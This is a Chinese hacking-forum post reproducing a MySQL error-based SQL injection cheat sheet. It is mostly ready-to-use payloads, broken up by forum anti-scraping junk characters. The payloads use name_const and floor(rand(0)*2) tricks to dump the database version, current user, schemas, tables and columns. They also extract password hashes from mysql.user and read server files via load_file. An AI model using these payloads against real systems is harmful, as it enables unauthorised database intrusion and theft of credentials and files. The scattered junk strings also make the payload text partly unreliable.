找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2204|回复: 0
打印 上一主题 下一主题

Mysql暴错注入参考(pdf)

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-27 11:00:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑 $ m5 w' F# T3 m" ?9 E( n; B
2 f1 _) l* u3 `/ Z! X

4 X: r2 o7 ~& A1 i: `/ @Mysql暴错注入参考(pdf),每天一贴。。。
, W# g. d5 E( _: d' X: _8 K4 T' ?2 z
MySql Error Based Injection Reference8 I. m: `* d" D1 v3 n
[Mysql暴错注入参考]
! q9 |* w. V9 YAuthornig0s1992
% e1 m5 v7 S& [* T4 _6 l- x( a0 hBlog:http://pnig0s1992.blog.51cto.com/
- @# b& P" j1 h" iTeAm:http://www.FreeBuf.com/
- a6 \! ?( k& l& I5 e% B6 q% z( E+ MMysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
/ X% C0 X# p$ |) m& a  h/ }" u# t小部分版本使用name_const()时会报错.可以用给出的Method.2测试0 W6 T( J+ D, y( z- w: J$ ]- @& q# k9 c# u
查询版本:$ R' A/ S1 L5 i! S
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+- `/ H: q4 n6 P) `  b
join+(select+name_const(@@version,0))b)c)
4 W; K) D- N) ~. S9 A" x9 oMethod.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
" N# d, G  o4 ?9 ~% w3 [0 y, hup by a)b)
" n' E4 F2 q1 ]/ v9 i查询当前用户:. F' `. |# G. Y! o0 u# Q
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
* G' v( q% ]" XMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
; M7 o; i( q1 [: h" Band(0)*2))x+from+information_schema.tables+group+by+x)a)
" C8 R4 Q! _" o. Q查询当前数据库:
4 J4 |$ f8 D$ M* Q( w0 IMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)6 Q) ]  {8 V2 C' T
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo3 J: q! \/ v: \1 x2 g2 z* j) G3 p# s
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
" ]7 |' q- m0 o' y( k0 [依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
4 e- x4 a; H/ M& l  E  E' RLIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n5 t8 O4 a9 e0 M+ }% W. T* u
顺序替换# |* w; e- ^* d- `4 Q! I
爆指定库数目:
6 S. R  F. [6 r* J& dand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t; @4 V2 S: j. _' ~/ {2 C
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+ g' N# \6 R! A8 ?+ Z: F' ^
+by+x)a)+and+1=1 0x6D7973716C=mysql
- E" N' g) [: [6 B5 q- p- J依次爆表:" i( @# I. l  R  `8 ?( c0 o
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
! \; r6 t$ f2 b& _+ e$ e2 ~able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
- v' ]5 n% w2 M; Kbles+group+by+x)a)+and+1=1+ s' d3 ]2 r  n# k! f- ?5 E7 Y$ \
0x6D7973716C=Mysql 将n顺序替换
9 \7 ?' e$ J$ m* B爆表内字段数目:* E! V* i/ y( w3 G- G! s
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
/ k4 V, G3 X* d& X+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
- ~2 _& Q6 P7 H0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
! h. ~8 d  \1 q# o4 ~6 m* A依次爆字段:
  X. Q5 ]7 i/ ?. ?) N7 zand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
  V$ E  K6 q$ h5 V8 [+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
7 H0 S# s% E$ e0 ^loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
/ K! m8 h# C: X) @- w依次暴内容:4 d, [# s5 t4 {. M2 e
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche- F1 s* [7 p- j, {9 R4 P
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=11 @: c) L9 ^7 f; k4 c! \
将n顺序替换% Z- e% ^3 j; a
爆文件内容:  f& K6 W- d+ O4 j
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
2 \  f+ x6 }; Y% U, Bfrom+information_schema.tables+group+by+a)b)
6 J9 n% c8 R8 p' }! q  f8 B0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节- i* ~4 Q" u/ j" R8 z
Thx for reading.4 r: E1 \: N$ n* o: H: \' I9 t

! V' J4 K8 ^. B3 }3 R* M8 D不要下载也可以, 6 ]2 s0 F( l6 E$ e! w

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表